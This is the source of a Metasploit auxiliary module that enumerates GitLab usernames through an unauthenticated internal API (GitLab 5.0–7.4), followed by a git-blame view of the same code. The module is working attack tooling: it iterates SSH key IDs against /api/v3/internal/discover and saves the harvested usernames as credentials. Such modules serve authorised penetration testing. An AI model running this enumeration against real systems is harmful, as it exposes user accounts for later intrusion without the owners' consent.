metasploit-framework/modules/auxiliary/scanner/http/gitlab_user_enum.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/proto/http'
require 'msf/core'
require 'json'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(
      info,
      'Name'        => 'Gitlab User Enumeration',
      'Description' => "
        The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This
        allows the username for each SSH Key ID number to be retrieved. Users
        who do not have an SSH Key cannot be enumerated in this fashion. LDAP
        users, e.g. Active Directory users will also be returned. This issue
        was fixed in Gitlab v7.5.0 and is present from Gitlab v5.0.0.
      ",
      'Author'      => 'Ben Campbell',
      'License'     => MSF_LICENSE,
      'DisclosureDate' => 'Oct 15 2014',
      'References'     =>
        [
          [ 'URL', 'https://labs.mwrinfosecurity.com/tools/gitlab-user-enumeration-metasploit-module' ]
        ]
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to Gitlab instance', '/']),
        OptInt.new('START_ID', [true, 'ID number to start from', 0]),
        OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])
      ], self.class)
  end

  def run_host(_ip)
    internal_api = '/api/v3/internal'
    check = normalize_uri(target_uri.path, internal_api, 'check')

    print_status('Sending gitlab version request...')
    res = send_request_cgi(
        'uri' => check
    )

    if res && res.code == 200 && res.body
      version = JSON.parse(res.body)
      git_version = version['gitlab_version']
      git_revision = version['gitlab_rev']
      print_good("GitLab version: #{git_version} revision: #{git_revision}")

      service = report_service(
        host: rhost,
        port: rport,
        name: (ssl ? 'https' : 'http'),
        proto: 'tcp'
      )

      report_web_site(
        host: rhost,
        port: rport,
        ssl: ssl,
        info: "Gitlab Version - #{git_version}"
      )
    elsif res && res.code == 401
      fail_with(Failure::NotVulnerable, 'Unable to retrieve Gitlab version...')
    else
      fail_with(Failure::Unknown, 'Unable to retrieve Gitlab version...')
    end

    discover = normalize_uri(target_uri.path, internal_api, 'discover')

    users = ''
    print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")
    datastore['START_ID'].upto(datastore['END_ID']) do |id|
      res = send_request_cgi(
          'uri'       => discover,
          'method'    => 'GET',
          'vars_get'  => { 'key_id' => id }
        )

      if res && res.code == 200 && res.body
        begin
          user = JSON.parse(res.body)
          username = user['username']
          unless username.nil? || username.to_s.empty?
            print_good("Key-ID: #{id} Username: #{username} Name: #{user['name']}")
            store_username(username, res)
            users << "#{username}\n"
          end
        rescue JSON::ParserError
          print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")
        end
      elsif res
        vprint_status("Key-ID: #{id} not found")
      else
        print_error('Connection timed out...')
      end
    end

    unless users.nil? || users.to_s.empty?
      store_userlist(users, service)
    end
  end

  def store_userlist(users, service)
    loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'Gitlab Users', service)
    print_good("Userlist stored at #{loot}")
  end

  def store_username(username, res)
    # Should the service be 'Gitlab'?
    service = ssl ? 'https' : 'http'
    service_data = {
      address: rhost,
      port: rport,
      service_name: service,
      protocol: 'tcp',
      workspace_id: myworkspace_id,
      proof: res
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: username
    }

    credential_data.merge!(service_data)

    # Create the Metasploit::Credential::Core object
    credential_core = create_credential(credential_data)

    # Assemble the options hash for creating the Metasploit::Credential::Login object
    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED
    }

    # Merge in the service data and create our Login
    login_data.merge!(service_data)
    create_credential_login(login_data)
  end
end
Initial commit 2014-08-17 04:39:12 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'rex/proto/http'`
			`require 'msf/core'`
			`require 'json'`

			`class Metasploit3 < Msf::Auxiliary`
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
Check revision 2014-12-15 17:20:23 +00:00			`super(update_info(`
			`info,`
Initial commit 2014-08-17 04:39:12 +00:00			`'Name' => 'Gitlab User Enumeration',`
Check revision 2014-12-15 17:20:23 +00:00			`'Description' => "`
Initial commit 2014-08-17 04:39:12 +00:00			`The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This`
			`allows the username for each SSH Key ID number to be retrieved. Users`
Check revision 2014-12-15 17:20:23 +00:00			`who do not have an SSH Key cannot be enumerated in this fashion. LDAP`
Small modifications 2015-03-17 10:03:32 +00:00			`users, e.g. Active Directory users will also be returned. This issue`
			`was fixed in Gitlab v7.5.0 and is present from Gitlab v5.0.0.`
Check revision 2014-12-15 17:20:23 +00:00			`",`
Initial commit 2014-08-17 04:39:12 +00:00			`'Author' => 'Ben Campbell',`
Check revision 2014-12-15 17:20:23 +00:00			`'License' => MSF_LICENSE,`
			`'DisclosureDate' => 'Oct 15 2014',`
			`'References' =>`
			`[`
Catch 7.5 401 2014-12-15 17:44:24 +00:00			`[ 'URL', 'https://labs.mwrinfosecurity.com/tools/gitlab-user-enumeration-metasploit-module' ]`
Check revision 2014-12-15 17:20:23 +00:00			`]`
			`))`
Initial commit 2014-08-17 04:39:12 +00:00
			`register_options(`
			`[`
			`OptString.new('TARGETURI', [ true, 'Path to Gitlab instance', '/']),`
			`OptInt.new('START_ID', [true, 'ID number to start from', 0]),`
			`OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])`
			`], self.class)`
			`end`

			`def run_host(_ip)`
Small modifications 2015-03-17 10:03:32 +00:00			`internal_api = '/api/v3/internal'`
Initial commit 2014-08-17 04:39:12 +00:00			`check = normalize_uri(target_uri.path, internal_api, 'check')`

			`print_status('Sending gitlab version request...')`
			`res = send_request_cgi(`
			`'uri' => check`
			`)`

			`if res && res.code == 200 && res.body`
			`version = JSON.parse(res.body)`
			`git_version = version['gitlab_version']`
			`git_revision = version['gitlab_rev']`
			`print_good("GitLab version: #{git_version} revision: #{git_revision}")`

Small modifications 2015-03-17 10:03:32 +00:00			`service = report_service(`
Initial commit 2014-08-17 04:39:12 +00:00			`host: rhost,`
			`port: rport,`
			`name: (ssl ? 'https' : 'http'),`
			`proto: 'tcp'`
			`)`

			`report_web_site(`
			`host: rhost,`
			`port: rport,`
			`ssl: ssl,`
			`info: "Gitlab Version - #{git_version}"`
			`)`
Catch 7.5 401 2014-12-15 17:44:24 +00:00			`elsif res && res.code == 401`
			`fail_with(Failure::NotVulnerable, 'Unable to retrieve Gitlab version...')`
Store creds in database 2014-12-15 18:13:22 +00:00			`else`
Check revision 2014-12-15 17:20:23 +00:00			`fail_with(Failure::Unknown, 'Unable to retrieve Gitlab version...')`
			`end`

Initial commit 2014-08-17 04:39:12 +00:00			`discover = normalize_uri(target_uri.path, internal_api, 'discover')`

Store to loot as well 2015-03-17 09:55:28 +00:00			`users = ''`
Initial commit 2014-08-17 04:39:12 +00:00			`print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")`
			`datastore['START_ID'].upto(datastore['END_ID']) do \|id\|`
			`res = send_request_cgi(`
			`'uri' => discover,`
			`'method' => 'GET',`
			`'vars_get' => { 'key_id' => id }`
			`)`

Store creds in database 2014-12-15 18:13:22 +00:00			`if res && res.code == 200 && res.body`
Initial commit 2014-08-17 04:39:12 +00:00			`begin`
			`user = JSON.parse(res.body)`
Store to loot as well 2015-03-17 09:55:28 +00:00			`username = user['username']`
			`unless username.nil? \|\| username.to_s.empty?`
			`print_good("Key-ID: #{id} Username: #{username} Name: #{user['name']}")`
			`store_username(username, res)`
			`users << "#{username}\n"`
			`end`
Initial commit 2014-08-17 04:39:12 +00:00			`rescue JSON::ParserError`
			`print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")`
			`end`
			`elsif res`
			`vprint_status("Key-ID: #{id} not found")`
			`else`
			`print_error('Connection timed out...')`
			`end`
			`end`
Store to loot as well 2015-03-17 09:55:28 +00:00
			`unless users.nil? \|\| users.to_s.empty?`
Small modifications 2015-03-17 10:03:32 +00:00			`store_userlist(users, service)`
Store to loot as well 2015-03-17 09:55:28 +00:00			`end`
			`end`

Small modifications 2015-03-17 10:03:32 +00:00			`def store_userlist(users, service)`
Store to loot as well 2015-03-17 09:55:28 +00:00			`loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'Gitlab Users', service)`
			`print_good("Userlist stored at #{loot}")`
Initial commit 2014-08-17 04:39:12 +00:00			`end`
Check revision 2014-12-15 17:20:23 +00:00
Store creds in database 2014-12-15 18:13:22 +00:00			`def store_username(username, res)`
			`# Should the service be 'Gitlab'?`
			`service = ssl ? 'https' : 'http'`
			`service_data = {`
			`address: rhost,`
			`port: rport,`
			`service_name: service,`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id,`
			`proof: res`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: username`
			`}`

			`credential_data.merge!(service_data)`

			`# Create the Metasploit::Credential::Core object`
			`credential_core = create_credential(credential_data)`

			`# Assemble the options hash for creating the Metasploit::Credential::Login object`
			`login_data = {`
			`core: credential_core,`
			`status: Metasploit::Model::Login::Status::UNTRIED`
			`}`

			`# Merge in the service data and create our Login`
			`login_data.merge!(service_data)`
			`create_credential_login(login_data)`
			`end`
			`end`